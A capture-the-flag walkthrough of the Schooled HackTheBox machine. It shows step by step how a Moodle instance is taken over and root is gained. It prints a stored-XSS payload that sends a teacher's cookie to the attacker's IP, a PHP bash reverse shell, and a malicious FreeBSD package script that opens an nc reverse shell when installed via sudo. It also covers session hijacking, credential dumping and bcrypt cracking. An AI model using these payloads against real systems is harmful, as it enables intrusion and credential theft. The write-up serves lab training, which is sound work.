Schooled HackTheBox WalkThrough

This is a walkthrough of the Schooled HackTheBox machine. In this writeup I demonstrate step by step how I rooted the Schooled HackTheBox machine. Before diving into the hacking part, a few facts about this box: it runs FreeBSD, has the IP address 10.10.10.234, and its maker rated it medium difficulty.

So first of all, connect your Kali/Parrot machine to the HackTheBox VPN and confirm connectivity with this machine by pinging its IP 10.10.10.234. If all goes well, start hacking. As usual I started by scanning the machine. Scanning gives us some idea of how to proceed further: it helps find open and closed ports and gives us information about the services running on them. I used Nmap for this task and the result is given below:

Scanning

$ sudo nmap -sC -sV -sT -oN nmap/Schooled.nmap 10.10.10.234

Nmap scan result in Schooled HackTheBox machine captured during its walkthrough

Nmap found ports 22 and 80 open: OpenSSH on port 22 and an Apache2 web server on port 80. Since Apache2 is running, there should be a website hosted on it, accessible at URL http://10.10.10.234. Visiting this URL revealed the host name schooled.htb.

Web page revealing schooled.htb host

And this page also contains some potential usernames. They are Manuel Phillips, Jane Higgins, Jamie Borham & Lianne Carter.

Web page revealing Potential usernames during Schooled HackTheBox Walkthrough

Before moving further, let us add schooled.htb pointing to IP 10.10.10.234 to our hosts file, which is /etc/hosts.

Hosts File After Modification 1

$ cat /etc/hosts


After some enumeration at http://schooled.htb, when I didn't get anything interesting, I performed a virtual host bruteforce using GoBuster (a directory and vhost bruteforcer).

Virtual Host Enumeration

$ gobuster vhost -u http://schooled.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

Performing Vhost enumeration in Schooled HTB

Virtual Host enumeration found moodle.schooled.htb. So let us add this host to our hosts file.

Hosts File After Modification 2

$ cat /etc/hosts


Going to URL http://moodle.schooled.htb/ showed that the site is built on Moodle LMS. Moodle is a free and open-source learning management system written in PHP and distributed under the GNU General Public License. Since it is an open-source project, you can get its source code from its GitHub repository.

moodle.schooled.htb web page

When I tried to Create New Account with an unusual email like [email protected], it replied with the expected email format [email protected]. This revealed the host name student.schooled.htb.

Login page of moodle LMS found during Schooled HackTheBox Walkthrough

So let us add this host too to our hosts file.

Hosts File After Modification 3

$ cat /etc/hosts


So, I registered a new user with the following credentials.

Password: Test@1234

Creating new user with the given credential in moodle.schooled.htb

After creating account click on Continue to confirm the account.

Click on continue to complete the registration process
Again click on continue to complete the registration process

As soon as I logged into this application, my next step was to find its version number so that I could search for known vulnerabilities affecting that version. But the version is shown only to the admin user, and we are currently logged in as a normal user.

At URL http://moodle.schooled.htb/moodle/enrol/index.php?id=5 you will find the enrol option for the Mathematics course. Click the Enrol me button to enrol yourself in the Mathematics course. After some googling I found that course enrolments in Moodle allowed privilege escalation from the teacher role to the manager role, and from there to RCE; see CVE-2020-14321 for more info. To use the CVE-2020-14321 exploit we first have to upgrade our account to teacher; a teacher can then escalate to manager.

But we are logged in as a normal student, so we can't run the above exploit yet. But wait, there is also an XSS vulnerability present in almost every version of Moodle 3.7, 3.8 and 3.9; check this link for more info about this vulnerability. Since there is an XSS vulnerability, we can steal a teacher's cookie using the basic XSS payload document.cookie and send it to a web server we control, i.e., a Python web server. The currently logged-in teachers are Manuel Phillips and Jamie Borham.

Finding XSS in MoodleNet Profile

Under Dashboard > My courses > Maths > General > Announcements > Reminder for joining student section, at URL http://moodle.schooled.htb/moodle/mod/forum/discuss.php?d=5, I got a hint about setting the MoodleNet profile.

Hints given by Manuel Phillips

After some more enumeration I found the MoodleNet profile field inside the profile section of user Test (this user may be different in your case). The direct link to edit the profile is http://moodle.schooled.htb/moodle/user/edit.php. After some fuzzing and spending some time on it, I found that the MoodleNet profile field is vulnerable to XSS. Since user Phillips will access everyone's profile, his cookie can be stolen with the following payload.

<img src=x onerror=this.src='http://10.10.14.56/?'+document.cookie;>

Simply go to the edit.php page at the above URL and start a Python3 HTTP server on your local machine. Put the above XSS payload in the MoodleNet profile field, leave the remaining fields as they are, and click Update profile to store the payload.

Injecting XSS payload to get Phillips' cookie

You will find the MoodleSession value in your web server log as shown below. This session value changes every time, so in your case it will be different. MoodleSession=l5sdijpju0j4smee1nvssai8l4

$ sudo python3 -m http.server 80

Getting Phillips' cookie after he accessed the test user page
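As an added example (not part of the original walkthrough and not Moodle's code), here is the defensive side of this bug in Python: the difference between dropping the stored MoodleNet field into HTML raw and output-encoding it, plus a hypothetical heuristic scan of stored profile values for injected markup. The sample rows are constructed; the third one is the payload shown above.

```python
import html
import re

# Constructed sample rows mimicking mdl_user (username, moodlenetprofile).
# The "test" row carries the payload from this walkthrough.
SAMPLE_PROFILES = [
    ("phillips", "@manuel@moodle.net"),
    ("carter", ""),
    ("test", "<img src=x onerror=this.src='http://10.10.14.56/?'+document.cookie;>"),
]

# Hypothetical heuristic: a MoodleNet handle has no reason to contain a tag,
# an inline event handler (onerror=, onload=, ...) or a javascript: URL.
SUSPICIOUS = re.compile(r"<\s*\w+|\bon\w+\s*=|javascript:", re.IGNORECASE)


def render_unsafe(value: str) -> str:
    """Mimics the vulnerable behaviour: raw field value dropped into HTML."""
    return f'<div class="moodlenet">{value}</div>'


def render_safe(value: str) -> str:
    """Output-encode the field so any stored markup is shown as text."""
    return f'<div class="moodlenet">{html.escape(value, quote=True)}</div>'


def is_suspicious(value: str) -> bool:
    """True when a stored profile value looks like injected markup."""
    return bool(SUSPICIOUS.search(value))


def find_suspicious_profiles(rows):
    """Return the usernames whose stored profile value trips the heuristic."""
    return [user for user, value in rows if is_suspicious(value)]


if __name__ == "__main__":
    for user in find_suspicious_profiles(SAMPLE_PROFILES):
        print(f"suspicious moodlenetprofile for user {user}")
    print(render_safe(SAMPLE_PROFILES[2][1]))
```

The scan is what you would run against a database dump after an incident; the escaping is the fix that makes the stored payload harmless on every page that displays the field.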

Hijacking Phillips Account using Captured Session

Now open the Inspector in your web browser in the same tab in which you are logged in as the normal user, replace the MoodleSession ID with the ID you got in the GET request, and refresh the page. Browser cookie before injecting the MoodleSession ID:

Cookie of Test user before modification

Browser cookie after injecting the MoodleSession ID got from the GET request:

Cookie of test user after modification

You will find that we have successfully hijacked user Phillips' account using the XSS vulnerability. Now it's time to follow CVE-2020-14321 to escalate privileges to manager.

Hijacked account of user Manuel Phillips during Schooled HackTheBox Walkthrough

Escalating Privilege From Teacher to Manager

Lianne Carter is a Manager, so we can escalate privileges to get into her account. But before this we have to enrol her as a participant in the same course which Phillips is teaching. To enrol her, go to Participants > Enrol users, click Enrol users to enrol her as a student, and intercept the request in BurpSuite.

Enrolling new participant Lianne Carter to mathematics subject

Simply change the parameter userlist[] to 24 (because 24 is the ID of Phillips) and roletoassign to 1 as shown below, then forward the request.

Modifying the request for Lianne Carter: changing the user ID to Phillips' and the role ID to Manager
Phillips user after enrolling as manager during Schooled HackTheBox Walkthrough

As you can see in the above screenshot, Manuel Phillips is assigned both the Manager and Teacher roles. Now enrol Lianne Carter as a student again by sending a valid request. We can see that both Lianne Carter and Manuel Phillips are registered as Manager.

Phillips and Lianne carter after enrolling as manager during Schooled HackTheBox Walkthrough

Under Site Administration menu click on Login As and login as Lianne Carter.

Site Administration page during Schooled HackTheBox Walkthrough

Once you are logged in as user Lianne Carter, go to URL http://moodle.schooled.htb/moodle/admin/roles/define.php. Click the Save changes button and intercept the request in Burpsuite.

Save Changes button to apply changes during Schooled HackTheBox Walkthrough

Capture the request in Burpsuite and follow this video to get a user shell. The link to this exploit is this.

Captured requests of all the roles and permission given to user Phillips during Schooled HackTheBox Walkthrough

Change the request as shown in the above video and forward it. Now go to http://moodle.schooled.htb/moodle/admin/tool/installaddon/index.php and install a vulnerable plugin. The link to the plugin is on GitHub.

Installing new vulnerable plugin during Schooled HackTheBox Walkthrough

Click Continue to install the plugin.

Processing page during Schooled HackTheBox Walkthrough

Once the plugin is installed, open the link below to confirm RCE. http://moodle.schooled.htb/blocks/rce/lang/en/block_rce.php?cmd=id

Confirming Remote Code Execution during Schooled HackTheBox Walkthrough

We have got RCE. Let us get a user shell. To get a user shell I replaced the content of block_rce.php with our reverse shell code (don't forget to change the IP to your tun0 IP). The code is

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.56/1234 0>&1'");?>

Getting User Shell

$ git clone https://github.com/HoangKien1020/Moodle_RCE

$ cd Moodle_RCE/

$ ls

$ unzip rce.zip

$ rm rce/lang/en/block_rce.php

$ vi rce/lang/en/block_rce.php

$ zip -r new_plugin.zip rce

$ ls

Creating custom vulnerable plugin to get user shell during Schooled HackTheBox Walkthrough

Now, before uploading and installing the plugin, start a netcat listener on your Kali machine. Once you install the plugin you will get a reverse shell on your Kali machine.

$ nc -nvlp 1234

$ whoami && id

Getting user shell on our Kali machine during Schooled HackTheBox Walkthrough

After some enumeration I found Moodle's config.php file inside the directory /usr/local/www/apache24/data/moodle/.

$ cat /usr/local/www/apache24/data/moodle/config.php

Config.php file of moodle LMS found after getting shell during Schooled HackTheBox Walkthrough

This file contains database credentials and some other information. The useful information that can be extracted from the above file is:

dbname : moodle

dbuser : moodle

dbpassword: PlaybookMaster2020

Let us log into the MySQL account of user moodle and grab credentials from the moodle database.

$ /usr/local/bin/mysql -u moodle -pPlaybookMaster2020 -e 'show databases;'

$ /usr/local/bin/mysql -u moodle -pPlaybookMaster2020 -e 'show tables from moodle;'

$ /usr/local/bin/mysql -u moodle -pPlaybookMaster2020 -e 'use moodle;select username,password,email from mdl_user;'

Logging into user moodle account using Database credential

—Snip—

Dumping users account from moodle database during Schooled HackTheBox Walkthrough

From the above output we can get the admin hash, and from the email ID it appears that admin is Jamie.

admin : $2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW

Let us identify the hash and crack it to get admin password.

Identifying Hash

$2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW

Online Hash identifier in Schooled HTB

The hash is bcrypt. Let us crack it using JohnTheRipper (an offline password cracker).
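As an added example (not code from the page, from John or from the online identifier), here is a small Python identifier that does what the online hash identifier did: it names the hash family from its modular-crypt prefix and splits the bcrypt string into version, cost, salt and digest. The prefix table and the regex are my own; the hash is the admin hash dumped above.

```python
import re

# Modular-crypt-format prefixes this identifier knows about. "bcrypt" is the
# --format name used with John on this page; the others are for comparison.
PREFIXES = {
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
}

# $2y$<cost>$ followed by a 22-char salt and a 31-char digest, both in
# bcrypt's own base64 alphabet (./A-Za-z0-9).
BCRYPT_RE = re.compile(
    r"^\$(2[aby])\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$"
)

# The admin hash dumped from mdl_user earlier on this page.
ADMIN_HASH = "$2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW"


def identify(hash_str: str) -> str:
    """Name the hash family from its modular-crypt prefix, or 'unknown'."""
    for prefix, name in PREFIXES.items():
        if hash_str.startswith(prefix):
            return name
    return "unknown"


def is_bcrypt(hash_str: str) -> bool:
    """True only for a well-formed bcrypt string, not just a matching prefix."""
    return BCRYPT_RE.match(hash_str) is not None


def parse_bcrypt(hash_str: str) -> dict:
    """Split a bcrypt string into version, cost, salt and digest."""
    m = BCRYPT_RE.match(hash_str)
    if m is None:
        raise ValueError("not a well-formed bcrypt hash")
    version, cost, salt, digest = m.groups()
    return {
        "version": version,
        "cost": int(cost),
        "rounds": 2 ** int(cost),  # key-setup iterations paid per password guess
        "salt": salt,
        "digest": digest,
    }


if __name__ == "__main__":
    print(identify(ADMIN_HASH), parse_bcrypt(ADMIN_HASH))
```

The cost factor is the defender's lever here: cost 10 means 1024 key-setup rounds per guess, which slows a cracker down but does not save a password that is in rockyou.txt.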

Cracking Hash

$ vi cred.hash

$ sudo john --format=bcrypt cred.hash --wordlist=/usr/share/wordlists/rockyou.txt

$ sudo john cred.hash --show

Cracking password using Johntheripper

So, the cracked password is !QAZ2wsx. Let us log into Jamie's account using SSH.

$ ssh 10.10.10.234 -l Jamie

~!QAZ2wsx

$ whoami && id

SSH into Schooled using Jamie's account in Schooled HackTheBox Walkthrough

We are successfully logged in as user jamie. Let us grab the user flag.

Capture User Flag

$ cat user.txt

Capturing user flag during Schooled HackTheBox Walkthrough

Privilege Escalation

To escalate privileges to root we first have to find a privilege escalation vector.

Finding PrivEsc Vector

The sudo -l command gave info about all special permissions given to user jamie. User jamie can run the update command and can install any package on the Schooled machine.

We will exploit this special permission to get a root shell. After some googling I found this article, which explains how to create a custom OpenBSD package. We can insert our reverse shell code in the custom package. When I created a custom package and tried to get a shell using it, I could easily escalate privileges to root. So our privilege escalation vector is sudo rights exploitation.

Finding Privilege Escalation Vector during Schooled HTB walkthrough

Getting Root Shell

To get the root shell do the following.

1. Create a shell script root.sh with the following content.

#!/bin/sh
STAGEDIR=/tmp/package
rm -rf ${STAGEDIR}
mkdir -p ${STAGEDIR}
cat >> ${STAGEDIR}/+PRE_INSTALL <<EOF
# careful here, this may clobber your system
echo "Resetting root shell"
rm /tmp/a;mkfifo /tmp/a;cat /tmp/a|/bin/sh -i 2>&1|nc 10.10.14.94 4321 >/tmp/a # Replace the IP with your tun0 IP
EOF
cat >> ${STAGEDIR}/+POST_INSTALL <<EOF
# careful here, this may clobber your system
echo "Registering root shell"
pw usermod -n root -s /bin/sh
EOF
cat >> ${STAGEDIR}/+MANIFEST <<EOF
name: mypackage
version: "1.0_5"
origin: sysutils/mypackage
comment: "automates stuff"
desc: "automates tasks which can also be undone later"
maintainer: [email protected]
www: https://doe.it
prefix: /
EOF
pkg create -m ${STAGEDIR}/ -r ${STAGEDIR}/ -o .

2. Make the script executable.

3. Start a netcat listener in another window.

4. Execute the script, then install the package it produced.

On Schooled Machine

$ ls

$ chmod +x root.sh

$ ./root.sh

$ ls

$ sudo pkg install --no-repo-update *.txz

Proceed with this action? [y/N]: y

On Kali Machine

$ nc -nvlp 4321

# whoami && id

Getting root shell in Schooled HackTheBox Walkthrough

We are root now. Let us capture the root flag.

Capture Root Flag

# cat /root/root.txt

Capturing root flag during Schooled HackTheBox Walkthrough

This was how I rooted the Schooled HackTheBox machine. I hope you learned something new from it. Thanks for reading this walkthrough. For any query or suggestion related to the walkthrough, feel free to write to us at [email protected].


Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am an InfoSec Consultant by day and a Bug Bounty Hunter & CTF player by night. Sometimes I write walkthroughs and other cyber security articles here. You can connect with me at https://www.linkedin.com/in/deepakdkm/